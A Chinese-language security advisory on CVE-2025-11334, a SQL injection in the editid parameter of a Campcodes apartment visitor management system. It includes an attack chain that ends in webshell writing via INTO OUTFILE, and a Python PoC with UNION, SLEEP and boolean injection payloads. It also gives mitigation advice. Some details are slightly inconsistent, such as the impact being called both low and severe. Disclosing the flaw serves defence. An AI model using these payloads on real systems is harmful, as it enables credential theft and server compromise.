CVE-2025-11334：Campcodes在线公寓访客管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11334

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Online Apartment Visitor Management System

漏洞概述

CVE-2025-11334是Campcodes Online Apartment Visitor Management System 1.0版本中存在的SQL注入安全漏洞。该漏洞位于系统的/visitor-detail.php文件中，具体涉及对editid参数的处理逻辑存在缺陷。攻击者可以通过构造恶意的SQL语句作为editid参数的值，实现对数据库的非法操作。由于该漏洞无需任何身份认证即可远程利用，且攻击复杂度较低，对系统的机密性、完整性和可用性均构成低级别威胁。该漏洞的PoC（概念验证代码）已公开发布，可能被恶意攻击者用于实际攻击活动中。Campcodes在线公寓访客管理系统是一款用于管理公寓访客记录的应用软件，广泛应用于住宅小区、公寓楼等场所的访客登记与管理场景。该漏洞的存在可能导致敏感访客数据泄露、数据篡改或系统权限被非法获取，对用户隐私和数据安全构成严重威胁。CVSS 3.1评分为7.3分，属于高危级别漏洞，建议相关用户尽快采取修复措施。

技术细节

该漏洞的根本原因在于/visitor-detail.php文件中的editid参数未经过充分的输入验证和参数化处理，直接将用户输入拼接到SQL查询语句中执行。攻击者可以利用标准的SQL注入技术，通过构造包含UNION SELECT、子查询或布尔盲注等payload的editid参数值，绕过应用程序的预期逻辑，直接与后端数据库进行交互。具体利用方式如下：攻击者首先访问/visitor-detail.php端点，并通过GET或POST方式传递editid参数。在正常情况下，该参数预期接收一个数字类型的访客记录ID，用于查询并显示对应的访客详情。然而，由于缺乏对输入数据的类型检查和SQL特殊字符过滤，攻击者可以注入类似'1 UNION SELECT username,password FROM admin--'的恶意SQL语句。当该请求被服务器处理时，注入的SQL语句将与原始查询合并执行，从而导致数据库中的敏感信息（如管理员凭据、访客个人信息等）被泄露。此外，攻击者还可以利用基于时间的盲注技术（如SLEEP函数）来逐步提取数据库内容，即使在没有直接错误回显的情况下也能成功利用。该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特权（PR:N），无需用户交互（UI:N），表明其利用门槛极低，潜在影响范围广泛。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎（如Shodan、Censys）或直接扫描目标服务器，识别运行Campcodes Online Apartment Visitor Management System 1.0的Web服务器，并定位/visitor-detail.php端点的存在。

STEP 2

步骤2：漏洞探测

攻击者向/visitor-detail.php发送带有editid参数的正常请求，确认端点响应正常后，尝试注入单引号、UNION SELECT等SQL注入测试payload，通过响应差异或错误信息确认SQL注入漏洞的存在。

STEP 3

步骤3：漏洞利用

攻击者根据数据库类型（MySQL/MariaDB）构造相应的注入payload，利用UNION联合查询、布尔盲注或时间盲注技术，从数据库中提取敏感信息，包括管理员凭据、访客个人信息、系统配置等。

STEP 4

步骤4：权限提升与数据窃取

利用获取的管理员凭据登录系统后台，或直接通过SQL注入读取文件系统（如LOAD_FILE）、写入Webshell（INTO OUTFILE），实现对服务器的完全控制。

STEP 5

步骤5：数据破坏或持久化

攻击者可以删除或篡改数据库中的访客记录、植入后门程序，或将窃取的敏感数据出售给第三方，对受害组织造成持续性损害。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11334 - SQL Injection PoC
# Target: Campcodes Online Apartment Visitor Management System 1.0
# Vulnerable File: /visitor-detail.php
# Vulnerable Parameter: editid

import requests

# Target URL
target_url = "http://target.com/visitor-detail.php"

# Normal request to verify the endpoint
def check_endpoint(url):
    response = requests.get(url)
    if response.status_code == 200:
        print("[+] Endpoint is accessible")
        return True
    return False

# SQL Injection payload via editid parameter
# Example: Extract database version using UNION-based injection
payload = "1 UNION SELECT 1,2,version(),4,5,6,7,8,9,10-- -"

def exploit_sqli(base_url, param_value):
    """
    Exploit SQL injection in editid parameter
    """
    params = {"editid": param_value}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml"
    }
    
    try:
        response = requests.get(base_url, params=params, headers=headers, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        # Check for SQL injection indicators
        if "error" in response.text.lower() or "warning" in response.text.lower():
            print("[!] Possible SQL error detected")
        
        # Extract data from response if UNION injection successful
        if "MariaDB" in response.text or "MySQL" in response.text:
            print("[+] Database version leaked!")
            return response.text
        
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

# Time-based blind SQL injection test
def time_based_test(base_url):
    """
    Test for time-based blind SQL injection
    """
    import time
    payload_t = "1' AND SLEEP(5)-- -"
    start_time = time.time()
    response = requests.get(base_url, params={"editid": payload_t}, timeout=15)
    elapsed = time.time() - start_time
    
    if elapsed >= 5:
        print(f"[+] Time-based SQLi confirmed! Response time: {elapsed:.2f}s")
        return True
    return False

# Boolean-based blind SQL injection
def boolean_based_test(base_url):
    """
    Test for boolean-based blind SQL injection
    """
    true_payload = "1' AND 1=1-- -"
    false_payload = "1' AND 1=2-- -"
    
    true_resp = requests.get(base_url, params={"editid": true_payload})
    false_resp = requests.get(base_url, params={"editid": false_payload})
    
    if len(true_resp.text) != len(false_resp.text):
        print("[+] Boolean-based SQLi confirmed!")
        return True
    return False

if __name__ == "__main__":
    if check_endpoint(target_url):
        # Run exploitation
        print("[*] Testing SQL Injection in editid parameter...")
        result = exploit_sqli(target_url, payload)
        
        # Additional tests
        time_based_test(target_url)
        boolean_based_test(target_url)
        
        print("[*] Exploitation complete")

影响范围

Campcodes Online Apartment Visitor Management System 1.0

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）使用Web应用防火墙（WAF）规则阻断包含SQL关键字（如UNION、SELECT、SLEEP等）的恶意请求；2）通过修改Web服务器配置或代码，对editid参数进行严格的类型检查和输入过滤，仅允许数字字符；3）暂时禁用/visitor-detail.php端点或限制其访问IP范围；4）监控数据库日志，检测异常的SQL查询行为；5）对数据库中的敏感数据进行加密存储，降低数据泄露风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11334
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11334
3 Details https://www.cvedetails.com/cve/CVE-2025-11334/
4 VulDB https://vuldb.com/cve/CVE-2025-11334
5 Link https://github.com/melody27/cve/issues/1
6 Link https://vuldb.com/?ctiid.327217
7 Link https://vuldb.com/?id.327217
8 Link https://vuldb.com/?submit.664583
9 Link https://www.campcodes.com/